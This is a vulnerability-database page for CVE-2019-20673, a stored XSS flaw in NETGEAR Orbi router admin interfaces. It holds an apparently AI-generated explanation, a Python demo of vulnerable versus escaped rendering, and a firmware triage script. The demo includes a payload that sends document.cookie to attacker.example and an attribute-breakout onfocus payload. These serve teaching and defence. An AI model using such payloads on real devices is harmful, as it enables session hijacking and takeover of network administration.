CVE-2019-20673
Description
Certain NETGEAR devices are affected by stored XSS. This affects RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK20 before 2.3.5.26, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK40 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and RBK50 before 2.3.5.30.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in the web management interface of multiple NETGEAR Orbi WiFi system models lets an attacker plant script that later executes in an administrator's browser.
Vulnerability
CVE-2019-20673 is a stored cross-site scripting (XSS) vulnerability affecting NETGEAR Orbi WiFi system models. The flaw exists in the web-based management interface of RBR20, RBS20, RBK20, RBR40, RBS40, RBK40, RBR50, RBS50, and RBK50 devices. Affected firmware versions are prior to 2.3.5.26 for the RBR20/RBS20/RBK20 models and prior to 2.3.5.30 for the RBR40/RBS40/RBK40/RBR50/RBS50/RBK50 models [1]. As with any stored XSS, attacker-supplied input is written to the device's configuration and later rendered into a management page without adequate output encoding, so the embedded script runs when an administrator views that page. The description does not identify the affected page or input field.
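To make the store-then-render mechanics concrete, here is an added example written for this page (not NETGEAR firmware; the `device_name` field and the two HTML templates are hypothetical stand-ins, since the description does not name the real page or parameter). It shows a settings handler that stores an admin-supplied value, the vulnerable rendering next to the output-encoded one, and a small parser-based check that reports whether the rendered markup would execute script in either text or attribute context.

```python
"""Stored XSS, vulnerable vs hardened rendering.  Illustrative example written
for this page; not NETGEAR code.  The 'device_name' field and both templates
are hypothetical: CVE-2019-20673's description does not name the real field."""
import html
from html.parser import HTMLParser
from typing import Dict, List

# Constructed in-memory store standing in for the device's persisted config.
SETTINGS: Dict[str, str] = {"device_name": "Orbi-Home"}


def save_setting(key: str, value: str) -> None:
    """The 'stored' half: the submitted value is written exactly as received."""
    SETTINGS[key] = value


def render_unsafe(key: str) -> str:
    """Vulnerable: raw stored value concatenated into text and attribute context."""
    v = SETTINGS[key]
    return f"<tr><td>Name</td><td>{v}</td></tr><input name='{key}' value='{v}'>"


def render_safe(key: str) -> str:
    """Hardened: HTML-encode on output; quote=True also escapes ' and " so the
    value cannot break out of a quoted attribute."""
    v = html.escape(SETTINGS[key], quote=True)
    return f"<tr><td>Name</td><td>{v}</td></tr><input name='{key}' value='{v}'>"


class ScriptSink(HTMLParser):
    """Records anything in parsed markup that would run script: <script>
    elements or on* event-handler attributes on any element."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def script_findings(markup: str) -> List[str]:
    """Tokenize rendered markup the way a browser would and list executable constructs."""
    sink = ScriptSink()
    sink.feed(markup)
    sink.close()
    return sink.findings


# Two constructed payloads: one for text context, one that breaks out of a
# single-quoted attribute and adds an event handler.
TEXT_PAYLOAD = "<script>fetch('//attacker.example/?c=' + document.cookie)</script>"
ATTR_PAYLOAD = "x' autofocus onfocus='alert(document.domain)"


def demo(payload: str) -> Dict[str, List[str]]:
    """Store one payload and report what each renderer would let execute."""
    save_setting("device_name", payload)
    return {"unsafe": script_findings(render_unsafe("device_name")),
            "safe": script_findings(render_safe("device_name"))}


if __name__ == "__main__":
    for p in (TEXT_PAYLOAD, ATTR_PAYLOAD):
        print(demo(p))
```

The attribute payload is the reason `quote=True` matters: escaping only `<`, `>` and `&` would still let a stored `'` close the `value` attribute and append `onfocus=`.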
Exploitation
An attacker exploits this by submitting a crafted value containing JavaScript to the affected device, which stores it; the script then runs in the browser of any authenticated administrator who later opens the page that renders the value [1]. The description does not state whether the attacker must already be authenticated to plant the payload, nor which page or field is affected. The only victim interaction needed is ordinary administrative browsing: unlike reflected XSS, no crafted link has to be clicked. The attack surface is the management interface itself, which is reachable on the LAN by default and from the internet only where remote management has been enabled.
Impact
Successful exploitation runs attacker-controlled JavaScript in the administrator's browser session on the device's origin. From there the script can hijack the session, capture credentials entered into the interface, deface pages, or issue configuration changes with the administrator's privileges (on a router this includes settings such as DNS servers and port forwarding) [1]. The result is a loss of confidentiality and integrity for the device and, through its configuration, for the network behind it.
Mitigation
NETGEAR released fixed firmware: 2.3.5.26 for RBR20/RBS20/RBK20 and 2.3.5.30 for RBR40/RBS40/RBK40/RBR50/RBS50/RBK50. Install the latest firmware from the NETGEAR Support website as soon as possible [1]. A device is fixed only if its firmware is at or above the threshold for its own model, so check each router and each satellite separately rather than assuming the whole Orbi system updated together. The reference lists no workaround; until the update is applied, keeping remote management disabled, logging out of the admin interface when finished, and not browsing other sites from the logged-in session reduce exposure but do not remove the flaw.
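A fleet-triage check against the thresholds above, as an added example (not NETGEAR tooling). It assumes firmware strings are dotted numerics with an optional leading "V" and that the model token comes first in the model string, before any hardware suffix; both are assumptions about the inventory format, and the sample inventory is constructed.

```python
"""Triage helper for CVE-2019-20673 thresholds.  Example written for this page,
not NETGEAR tooling.  Assumes dotted numeric firmware strings with an optional
leading 'V' (e.g. 'V2.3.5.30') and model strings that begin with the model
token (e.g. 'RBR50-100NAS'); both are assumptions about the inventory format."""
from typing import Dict, Iterable, List, Tuple

# First fixed firmware per model, as given in the CVE description.
FIXED_VERSION: Dict[str, str] = {
    "RBR20": "2.3.5.26", "RBS20": "2.3.5.26", "RBK20": "2.3.5.26",
    "RBR40": "2.3.5.30", "RBS40": "2.3.5.30", "RBK40": "2.3.5.30",
    "RBR50": "2.3.5.30", "RBS50": "2.3.5.30", "RBK50": "2.3.5.30",
}


def parse_version(fw: str) -> Tuple[int, ...]:
    """'V2.3.5.30' -> (2, 3, 5, 30).  Integer tuples compare correctly where a
    plain string comparison does not ('2.3.5.9' > '2.3.5.26' as strings)."""
    fw = fw.strip()
    if fw[:1] in ("V", "v"):
        fw = fw[1:]
    return tuple(int(part) for part in fw.split("."))


def normalize_model(model: str) -> str:
    """'rbr50-100nas' -> 'RBR50': keep the model token before any hardware suffix."""
    return model.strip().upper().split("-")[0]


def is_affected(model: str, firmware: str) -> bool:
    """True when the model is in scope for this CVE and runs firmware older than the fix."""
    fixed = FIXED_VERSION.get(normalize_model(model))
    if fixed is None:
        return False  # model not listed in CVE-2019-20673
    return parse_version(firmware) < parse_version(fixed)


def triage(inventory: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Return the (host, model, firmware) rows that still need the fixed firmware."""
    return [row for row in inventory if is_affected(row[1], row[2])]


# Constructed sample inventory (not real hosts).
SAMPLE_INVENTORY = [
    ("orbi-router", "RBR50-100NAS", "V2.3.5.9"),
    ("orbi-sat-1", "RBS50", "V2.3.5.30"),
    ("orbi-mini", "RBR20", "2.3.5.25"),
    ("orbi-mini-sat", "RBS20", "2.3.5.26"),
    ("office-r7000", "R7000", "1.0.11.100"),
]

if __name__ == "__main__":
    for host, model, fw in triage(SAMPLE_INVENTORY):
        fixed = FIXED_VERSION[normalize_model(model)]
        print(f"{host}: {model} {fw} is vulnerable; update to {fixed}")
```

The numeric comparison is the point worth keeping: a naive string compare would mark `2.3.5.9` as newer than `2.3.5.26` and report a vulnerable router as patched.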
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
NETGEAR RBR20, RBS20, RBK20 (firmware before 2.3.5.26); NETGEAR RBR40, RBS40, RBK40, RBR50, RBS50, RBK50 (firmware before 2.3.5.30)
Patches
No patches discovered yet.
References